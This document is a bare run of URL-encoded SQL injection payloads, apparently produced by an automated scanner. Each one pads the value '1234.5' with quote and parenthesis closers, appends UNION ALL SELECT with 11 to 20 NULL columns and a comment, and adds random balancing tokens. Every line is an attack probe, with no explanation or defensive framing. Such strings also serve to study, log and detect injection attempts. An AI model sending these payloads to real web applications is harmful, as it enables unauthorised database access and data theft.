1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27lqHr%27%20LIKE%20%27lqHr 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27LIcF%27%20LIKE%20%27LIcF 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27nDVa%27%20LIKE%20%27nDVa 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27cPgj%27%20LIKE%20%27cPgj 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27EZvP%27%20LIKE%20%27EZvP 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27qxpF%27%20LIKE%20%27qxpF 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27hgpi%27%20LIKE%20%27hgpi 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27hOZc%27%20LIKE%20%27hOZc 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22JMxN%22%3D%22JMxN 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22qolu%22%3D%22qolu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22gnYu%22%3D%22gnYu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22OFYP%22%3D%22OFYP 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22ArXe%22%3D%22ArXe 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22PRHh%22%3D%22PRHh 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22oNoM%22%3D%22oNoM 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Whyx%22%3D%22Whyx 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22AzQZ%22%3D%22AzQZ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22CGnM%22%3D%22CGnM 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ppEC%22%3D%22ppEC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22vqGL%22%3D%22vqGL 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22woQS%22%3D%22woQS 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22xoBW%22%3D%22xoBW 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22HYoO%22%3D%22HYoO 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22xGKz%22%3D%22xGKz 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22OAAf%22%3D%22OAAf 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22eBGY%22%3D%22eBGY 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22SvIP%22%3D%22SvIP 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ANOK%22%3D%22ANOK 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22zNzR%22%3D%22zNzR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22WPIa%22%3D%22WPIa 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Marw%22%3D%22Marw 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22oVSW%22%3D%22oVSW 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22MoMU%22%3D%22MoMU 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22InUr%22%3D%22InUr 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22nzqK%22%3D%22nzqK 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22YKXB%22%3D%22YKXB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22jSbR%22%3D%22jSbR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22faOs%22%3D%22faOs 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22wvQW%22%3D%22wvQW 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22kCHT%22%3D%22kCHT 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22KUbg%22%3D%22KUbg 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22jvRN%22%3D%22jvRN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ckiE%22%3D%22ckiE 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22lBIp%22%3D%22lBIp 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22bPXn%22%3D%22bPXn 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22uYAu%22%3D%22uYAu 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22irCx%22%3D%22irCx 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22sCoL%22%3D%22sCoL 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22CkiV%22%20LIKE%20%22CkiV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22xRkg%22%20LIKE%20%22xRkg 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22ghbe%22%20LIKE%20%22ghbe 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22AlqC%22%20LIKE%20%22AlqC 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22hPPP%22%20LIKE%20%22hPPP 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22xrwb%22%20LIKE%20%22xrwb 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22IhxN%22%20LIKE%20%22IhxN 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22qMLz%22%20LIKE%20%22qMLz 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22IjvD%22%20LIKE%20%22IjvD 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Kjfw%22%20LIKE%20%22Kjfw 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22YzRS%22%20LIKE%20%22YzRS 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22lyBN%22%20LIKE%20%22lyBN 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22umzk%22%20LIKE%20%22umzk 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22aJiY%22%20LIKE%20%22aJiY 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22seIc%22%20LIKE%20%22seIc 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22OvDx%22%20LIKE%20%22OvDx 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22kWFs%22%20LIKE%20%22kWFs 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22gayy%22%20LIKE%20%22gayy 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22TPVr%22%20LIKE%20%22TPVr 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22KzgT%22%20LIKE%20%22KzgT 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22EfIB%22%20LIKE%20%22EfIB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22jAnf%22%20LIKE%20%22jAnf 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ggJG%22%20LIKE%20%22ggJG 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ImMf%22%20LIKE%20%22ImMf 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22kjtJ%22%20LIKE%20%22kjtJ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22dear%22%20LIKE%20%22dear 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22ukDV%22%20LIKE%20%22ukDV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22EFNo%22%20LIKE%20%22EFNo 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22sQnR%22%20LIKE%20%22sQnR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22rLTt%22%20LIKE%20%22rLTt 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22TjrJ%22%20LIKE%20%22TjrJ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22UnbY%22%20LIKE%20%22UnbY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22FDgc%22%20LIKE%20%22FDgc 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22IsxQ%22%20LIKE%20%22IsxQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22QhpN%22%20LIKE%20%22QhpN 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ftPX%22%20LIKE%20%22ftPX 